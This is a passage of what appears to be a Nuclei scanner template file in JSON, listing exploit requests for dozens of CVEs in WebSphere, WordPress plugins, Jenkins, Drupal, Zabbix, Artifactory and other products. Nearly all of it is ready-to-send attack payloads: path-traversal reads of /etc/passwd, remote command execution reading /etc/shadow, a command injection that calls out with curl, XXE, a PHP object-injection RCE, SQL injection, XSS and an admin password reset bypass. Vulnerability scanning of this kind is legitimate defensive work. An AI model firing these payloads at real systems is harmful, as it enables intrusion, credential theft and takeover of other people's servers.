cHRvci5FY2xpcHNlU3RhcnRlcnQAE0VjbGlwc2VTdGFydGVyLmphdmF0AANydW5zcQB+AA4AAACzdAAvb3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmFkYXB0b3IuRWNsaXBzZVN0YXJ0ZXJ0ABNFY2xpcHNlU3RhcnRlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAABVHQAHm9yZy5lY2xpcHNlLmNvcmUubGF1bmNoZXIuTWFpbnQACU1haW4uamF2YXQAD2ludm9rZUZyYW1ld29ya3NxAH4ADgAAARp0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AAhiYXNpY1J1bnNxAH4ADgAAA9V0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AANydW5zcQB+AA4AAAGQdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQADWxhdW5jaEVjbGlwc2VzcQB+AA4AAACjdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQABG1haW5wcHBwcHBwcHB4\" xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"8.5.5.7\" ns0:JMXMessageVersion=\"1.2.0\" ns0:JMXVersion=\"1.2.0\">\n</SOAP-ENV:Header>\n<SOAP-ENV:Body>\n<ns1:invoke xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n<objectname xsi:type=\"ns1:javax.management.ObjectName\">rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==</objectname>\n<operationname xsi:type=\"xsd:string\">getUnsavedChanges</operationname>\n<params xsi:type=\"ns1:[Ljava.lang.Object;\">{{ generate_java_gadget(\"dns\", \"{{interactsh-url}}\", \"base64-raw\")}}</params>\n<signature xsi:type=\"ns1:[Ljava.lang.String;\">rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=</signature>\n</ns1:invoke>\n</SOAP-ENV:Body>\n</SOAP-ENV:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["SOAP-ENV:Server","<faultcode>"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2015-3035","info":{"name":"TP-LINK - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/login/../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2755","info":{"name":"WordPress AB Google Map Travel <=3.4 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nPOST /wp-admin/admin.php?page=ab_map_options HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlat=%22%3E+%3Cscript%3E%2B-%2B-1-%2B-%2Balert%28document.domain%29%3C%2Fscript%3E&long=76.26730&lang=en&map_width=500&map_height=300&zoom=7&day_less_five_fare=2&day_more_five_fare=1.5&less_five_fare=3&more_five_fare=2.5&curr_format=%24&submit=Update+Settings\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>+-+-1-+-+alert(document.domain)</script>\")","contains(body_2, \"ab-google-map-travel\")"],"condition":"and"}]}]},{"id":"CVE-2015-1503","info":{"name":"IceWarp Mail Server <11.1.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd","{{BaseURL}}/webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7823","info":{"name":"Kentico CMS 8.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2015-2996","info":{"name":"SysAid Help Desk <15.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd","{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11580","info":{"name":"Atlassian Crowd and Crowd Data Center Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["root:*:","bin:*:"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7609","info":{"name":"Kibana Timelion - Arbitrary Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/timelion/run"],"body":"{\"sheet\":[\".es(*)\"],\"time\":{\"from\":\"now-1m\",\"to\":\"now\",\"mode\":\"quick\",\"interval\":\"auto\",\"timezone\":\"Asia/Shanghai\"}}","headers":{"Content-Type":"application/json; charset=utf-8"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["seriesList"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7219","info":{"name":"Zarafa WebApp <=2.0.1.47791 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webapp/?fccc%27\\%22%3E%3Csvg/onload=alert(/xss/)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(/xss/)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11013","info":{"name":"Nimble Streamer <=3.5.4-9 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18393","info":{"name":"Ignite Realtime Openfire <4.42 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/search/..\\..\\..\\conf\\openfire.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["org.jivesoftware.database.EmbeddedConnectionProvider","Most properties are stored in the Openfire database"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12616","info":{"name":"phpMyAdmin <4.9.0 - Cross-Site Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/phpmyadmin/"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 4.9.0')"]},{"type":"word","words":["phpmyadmin.net","phpMyAdmin"],"condition":"or"},{"type":"status","status":[200,401]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\\?v=([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["\\?v=([0-9.]+)"]}]}]},{"id":"CVE-2019-10092","info":{"name":"Apache HTTP Server <=2.4.39 -  HTML Injection/Partial Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5cgoogle.com/evil.html"],"matchers":[{"type":"word","words":["<a href=\"/\\google.com/evil.html\">"]}]}]},{"id":"CVE-2019-17444","info":{"name":"Jfrog Artifactory <6.17.0 - Default Admin Password","severity":"critical"},"requests":[{"raw":["POST /ui/api/v1/ui/auth/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nX-Requested-With: XMLHttpRequest\nOrigin: {{RootURL}}\n\n{\"user\":\"admin\",\"password\":\"password\",\"type\":\"login\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"name\":\"admin\"","\"admin\":true"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2767","info":{"name":"Oracle Business Intelligence Publisher - XML External Entity Injection","severity":"high"},"requests":[{"raw":["GET /xmlpserver/convert?xml=<%3fxml+version%3d\"1.0\"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+\"http%3a//{{interactsh-url}}/xxe.xml\">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-16097","info":{"name":"Harbor <=1.82.0 - Privilege Escalation","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/users"],"body":"{\"username\": \"testpoc\", \"has_admin_role\": true, \"password\": \"TestPoc!\", \"email\": \"testpoc@interact.sh\", \"realname\": \"poc\"}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["username has already been used","Location: /api/users/"],"condition":"or"},{"type":"status","status":[201,409],"condition":"or"}]}]},{"id":"CVE-2019-14251","info":{"name":"T24 Web Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd","{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20933","info":{"name":"InfluxDB <1.7.6 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/query?db=db&q=SHOW%20DATABASES"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"results\":","\"name\":\"databases\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9922","info":{"name":"Joomla! Harmis Messenger 1.2.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9670","info":{"name":"Synacor Zimbra Collaboration <8.7.11p10 - XML External Entity Injection","severity":"critical"},"requests":[{"raw":["POST /Autodiscover/Autodiscover.xml HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<!DOCTYPE xxe [\n<!ELEMENT name ANY >\n<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>\n<Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a\">\n<Request>\n<EMailAddress>aaaaa</EMailAddress>\n<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>\n</Request>\n</Autodiscover>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","Problem accessing"],"condition":"and"},{"type":"status","status":[503]}]}]},{"id":"CVE-2019-16931","info":{"name":"WordPress Visualizer <3.3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-json/visualizer/v1/update-chart HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\": 7, \"visualizer-chart-type\": \"<script>alert(document.domain)</script>\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"success\":\"Chart updated\"}"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9618","info":{"name":"WordPress GraceMedia Media Player 1.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2019-10475","info":{"name":"Jenkins build-metrics 1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1337)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14322","info":{"name":"Pallets Werkzeug <0.15.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/base_import/static/c:/windows/win.ini","{{BaseURL}}/web/static/c:/windows/win.ini","{{BaseURL}}/base/static/c:/windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-5418","info":{"name":"Rails File Content Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"Accept":"../../../../../../../../etc/passwd{{"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2019-2616","info":{"name":"Oracle Business Intelligence/XML Publisher - XML External Entity Injection","severity":"high"},"requests":[{"raw":["POST /xmlpserver/ReportTemplateService.xls HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nContent-Type: text/xml; charset=UTF-8\n\n<!DOCTYPE soap:envelope PUBLIC \"-//B/A/EN\" \"http://{{interactsh-url}}\">\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-18818","info":{"name":"strapi CMS <3.0.0-beta.17.5 - Admin Password Reset","severity":"critical"},"requests":[{"raw":["POST /admin/auth/reset-password HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/json\n\n{\"code\": {\"$gt\": 0}, \"password\": \"SuperStrongPassword1\", \"passwordConfirmation\": \"SuperStrongPassword1\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"username\":","\"email\":","\"jwt\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","json":[".user.username",".user.email"]}]}]},{"id":"CVE-2019-6112","info":{"name":"WordPress Sell Media 2.4.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["id=\"sell-media-search-text\" class=\"sell-media-search-text\"","alert(1337)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14750","info":{"name":"osTicket < 1.12.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /upload/setup/install.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ns=install&name={{user_name}}&email={{user_email}}&lang_id=en_US&fname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&lname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&admin_email={{user_email}}&username={{user_name}}&passwd={{user_pass}}&passwd2={{user_pass}}&prefix=ost_&dbhost={{dbhost}}&dbname=tt&dbuser={{username}}&dbpass={{password}}&timezone=Asia%2FTokyo\n","GET /upload/scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /upload/scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__CSRFToken__={{csrftoken}}&do=scplogin&userid={{user_name}}&passwd={{user_pass}}&ajax=1\n","GET /upload/scp/settings.php HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["<img src=x onerror=alert(1);>","getConfig().resolve"],"condition":"and"},{"type":"word","part":"header_4","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrftoken","part":"body","group":1,"regex":["__CSRFToken__\" value=\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2019-17382","info":{"name":"Zabbix <=4.4 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"ids":"helpers/wordlists/numbers.txt"},"stop-at-first-match":true,"threads":50,"matchers-condition":"and","matchers":[{"type":"word","words":["<title>Dashboard</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16932","info":{"name":"Visualizer <3.3.1 - Blind Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-json/visualizer/v1/upload-data"],"body":"{\\\"url\\\":\\\"http://{{interactsh-url}}\\\"}","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","name":"http","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18922","info":{"name":"Allied Telesis AT-GS950/8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10098","info":{"name":"Apache HTTP server v2.4.0 to v2.4.39 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/http%3A%2F%2Fwww.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2019-14530","info":{"name":"OpenEMR <5.0.2 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_login_session_management=1&authProvider=Default&authUser={{username}}&clearPass={{password}}&languageChoice=1\n","GET /custom/ajax_download.php?fileName=../../../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["filename=passwd"]},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10405","info":{"name":"Jenkins <=2.196 - Cookie Exposure","severity":"medium"},"requests":[{"raw":["GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n","GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html","x-jenkins"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"body_2","words":["Cookie","JSESSIONID"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","kval":["x_jenkins"]}]}]},{"id":"CVE-2019-17506","info":{"name":"D-Link DIR-868L/817LW - Information Disclosure","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/getcfg.php"],"body":"SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a\n","headers":{"Content-Type":"text/xml"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</password>","DEVICE.ACCOUNT"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9041","info":{"name":"ZZZCMS 1.6.1 - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/search/"],"body":"keys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["phpinfo","PHP Version"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20224","info":{"name":"Pandora FMS 7.0NG - Remote Command Injection","severity":"high"},"requests":[{"raw":["POST /pandora_console/index.php?login=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnick=admin&pass=admin&login_button=Login\n","POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndate=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","name":"http","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9915","info":{"name":"GetSimple CMS 3.3.13 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /admin/index.php?redirect=https://interact.sh/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuserid={{username}}&pwd={{password}}&submitted=Login\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/"]}]}]},{"id":"CVE-2019-7256","info":{"name":"eMerge E3 1.00-06 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20{{file}}.txt%60 HTTP/1.1\nHost: {{Hostname}}\n","GET /{{file}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10717","info":{"name":"BlogEngine.NET 3.3.7.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/filemanager?path=%2F..%2f..%2fContent"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","regex":["~/App_Data/files/../../([a-zA-Z0-9\\.\\-]+)/([a-z0-9]+)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7481","info":{"name":"SonicWall SRA 4600 VPN - SQL Injection","severity":"high"},"requests":[{"raw":["POST /cgi-bin/supportInstaller HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: identity\nUser-Agent: MSIE\nContent-Type: application/x-www-form-urlencoded\n\nfromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0--\n"],"matchers":[{"type":"word","part":"body","words":["4220397236"]}]}]},{"id":"CVE-2019-12962","info":{"name":"LiveZilla Server 8.0.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mobile/index.php"],"headers":{"Accept-Language":";alert(document.domain)//"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var detectedLanguage = ';alert(document.domain)//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6340","info":{"name":"Drupal - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/node/1?_format=hal_json"],"body":"{ \"link\": [ { \"value\": \"link\", \"options\": \"O:24:\\\"GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000handler\\\";s:2:\\\"id\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve\\\";}}\" } ], \"_links\": { \"type\": { \"href\": \"http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default\" } } }","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-0221","info":{"name":"Apache Tomcat - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/printenv.shtml?{{url_encode(payload)}}","{{BaseURL}}/ssi/printenv.shtml?{{url_encode(payload)}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["QUERY_STRING_UNESCAPED={{payload}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9733","info":{"name":"JFrog Artifactory 6.7.3 - Admin Login Bypass","severity":"critical"},"requests":[{"raw":["POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nX-Requested-With: artUI\nX-Forwarded-For: 127.0.0.1\nRequest-Agent: artifactoryUI\nContent-Type: application/json\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/artifactory/webapp/\n\n{\"user\":\"access-admin\",\"password\":\"password\",\"type\":\"login\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\": \"access-admin\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18394","info":{"name":"Ignite Realtime Openfire <=4.4.2 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/getFavicon?host=http://oast.fun/"],"matchers":[{"type":"dsl","dsl":["contains(body, 'Interactsh Server')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2019-12461","info":{"name":"WebPort 